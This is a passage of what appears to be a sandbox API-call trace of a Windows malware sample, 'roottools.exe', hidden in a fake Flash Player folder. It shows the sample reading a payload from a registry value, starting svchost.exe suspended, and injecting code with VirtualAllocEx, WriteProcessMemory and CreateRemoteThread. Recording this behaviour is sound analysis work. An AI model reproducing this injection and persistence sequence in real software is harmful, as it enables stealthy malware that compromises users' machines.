bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0337.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18ff64 | out: TokenHandle=0x18ff64*=0x140) returned 1 [0337.997] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff4c | out: TokenInformation=0x0, ReturnLength=0x18ff4c) returned 0 [0337.998] GetLastError () returned 0x7a [0337.998] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0x1, TokenInformation=0x35df9b0, TokenInformationLength=0x24, ReturnLength=0x18ff4c | out: TokenInformation=0x35df9b0, ReturnLength=0x18ff4c) returned 1 [0337.998] GetTokenInformation (in: TokenHandle=0x140, TokenInformationClass=0xc, TokenInformation=0x4177e0, TokenInformationLength=0x4, ReturnLength=0x18ff60 | out: TokenInformation=0x4177e0, ReturnLength=0x18ff60) returned 1 [0337.998] CloseHandle (hObject=0x140) returned 1 [0337.998] GetLengthSid (pSid=0x35df9b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0337.998] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x417810 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0337.999] PathRemoveBackslashW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned="g" [0337.999] GetCurrentProcess () returned 0xffffffff [0337.999] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x18fd64, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0337.999] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77cb0000 [0337.999] GetProcAddress (hModule=0x77cb0000, lpProcName="RtlDosPathNameToNtPathName_U") returned 0x77d0ce41 [0337.999] GetProcAddress (hModule=0x77cb0000, lpProcName="NtCreateFile") returned 0x77cd00a4 [0337.999] GetProcAddress (hModule=0x77cb0000, lpProcName="NtClose") returned 0x77ccf9d0 [0337.999] GetProcAddress (hModule=0x77cb0000, lpProcName="NtQueryEaFile") returned 0x77cd1314 [0337.999] GetProcAddress (hModule=0x77cb0000, lpProcName="NtSetEaFile") returned 0x77cd19b0 [0337.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtPathName=0x18f880, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0337.999] NtCreateFile (in: FileHandle=0x18f874, DesiredAccess=0x8, ObjectAttributes=0x18f888*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18f878, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x18f874*=0x14c, IoStatusBlock=0x18f878*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0337.999] NtQueryEaFile (in: FileHandle=0x14c, IoStatusBlock=0x18f878, Buffer=0x35dfb08, Length=0x409, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x18f878, Buffer=0x35dfb08) returned 0x0 [0338.000] NtClose (Handle=0x14c) returned 0x0 [0338.000] StrCmpNIW (lpStr1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpStr2="C:\\Users\\aETAdzjz\\AppData\\Roaming", nChar=33) returned 0 [0338.000] lstrcmpiW (lpString1="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 0 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="C2") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E6") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EC") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="E9") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="93") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="8A") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="43") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="20") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6F") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="2A") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="85") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4E") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="36") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DB") returned 2 [0338.000] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="C2E6ECE9938A43206F172A85684E36DB") returned 0x14c [0338.000] GetLastError () returned 0x0 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9B") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="4D") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="68") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="96") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="17") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="31") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FE") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="3C") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="22") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DA") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="08") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0338.000] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="40") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="79") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="9E") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="B6") returned 2 [0338.001] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="9B4D68961731FE3C22DA08B640799EB6") returned 0x148 [0338.001] CloseHandle (hObject=0x148) returned 1 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="7F") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="0E") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="6C") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A1") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="75") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D0") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="AD") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="DE") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="F9") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="23") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FD") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A0") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EF") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D2") returned 2 [0338.001] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="11") returned 2 [0338.001] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="7F0E6CA175D0ADDEF923FDA009EFD211") returned 0x148 [0338.001] SetEvent (hEvent=0x148) returned 1 [0338.003] CloseHandle (hObject=0x148) returned 1 [0338.013] PathCombineW (in: pszDest=0x418f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0338.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f810, cbMultiByte=8, lpWideCharStr=0x419730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0338.014] PathCombineW (in: pszDest=0x419428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0338.014] PathCombineW (in: pszDest=0x419748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0338.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x18f828 | out: phkResult=0x18f828*=0x148) returned 0x0 [0338.014] RegQueryValueExW (in: hKey=0x148, lpValueName="Omegovna", lpReserved=0x0, lpType=0x18f854, lpData=0x0, lpcbData=0x18f83c*=0x0 | out: lpType=0x18f854*=0x3, lpData=0x0, lpcbData=0x18f83c*=0x6f0) returned 0x0 [0338.014] RegQueryValueExW (in: hKey=0x148, lpValueName="Omegovna", lpReserved=0x0, lpType=0x18f854, lpData=0x3560590, lpcbData=0x18f83c*=0x6f0 | out: lpType=0x18f854*=0x3, lpData=0x3560590*, lpcbData=0x18f83c*=0x6f0) returned 0x0 [0338.014] RegCloseKey (hKey=0x148) returned 0x0 [0458.027] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0458.029] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E5") returned 2 [0458.029] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="8E") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FF") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="54") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="09") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="68") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A4") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="36") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E9") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="82") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FC") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FA") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="1C") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="04") returned 2 [0458.030] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="45") returned 2 [0458.031] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A2") returned 2 [0458.031] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0458.031] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0458.031] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0458.031] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x134, hThread=0x150, dwProcessId=0x638, dwThreadId=0x6fc)) returned 1 [0458.041] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="A6") returned 2 [0458.041] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="3A") returned 2 [0458.041] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="6C") returned 2 [0458.041] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="DA") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="30") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="8C") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="F3") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="B4") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="F1") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="0C") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="6B") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="82") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D6") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="B9") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="EA") returned 2 [0458.042] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="5B") returned 2 [0458.043] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="A63A6CDA308CF3B4F10C6B82D6B9EA5B") returned 0x15c [0458.043] GetLastError () returned 0x0 [0458.043] VirtualAllocEx (hProcess=0x134, lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0458.046] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x70000, lpBuffer=0x356d370*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x356d370*, lpNumberOfBytesWritten=0x0) returned 1 [0458.050] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x15c, hTargetProcessHandle=0x134, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0458.050] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x876c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0458.051] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x877d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0458.052] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x134, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0458.052] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x87d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0458.053] CreateRemoteThread (in: hProcess=0x134, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x158 [0458.054] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0x7d0) returned 0x0 [0458.186] CloseHandle (hObject=0x158) returned 1 [0458.186] CloseHandle (hObject=0x15c) returned 1 [0458.186] CloseHandle (hObject=0x150) returned 1 [0458.186] CloseHandle (hObject=0x134) returned 1 [0458.186] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="20") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="BC") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="29") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E1") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="35") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FB") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="9B") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="01") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="28") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="51") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="87") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E3") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="B5") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="59") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="3C") returned 2 [0458.186] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="C8") returned 2 [0458.186] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0458.186] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0458.186] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0458.187] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x150, hThread=0x134, dwProcessId=0x7e0, dwThreadId=0xf4)) returned 1 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="62") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="9B") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="C1") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="38") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D1") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="48") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="FE") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="C8") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="0D") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="AF") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="76") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D4") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="54") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="EF") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="25") returned 2 [0458.188] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="2E") returned 2 [0458.188] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="629BC138D148FEC80DAF76D454EF252E") returned 0x158 [0458.188] GetLastError () returned 0x0 [0458.189] VirtualAllocEx (hProcess=0x150, lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0458.189] WriteProcessMemory (in: 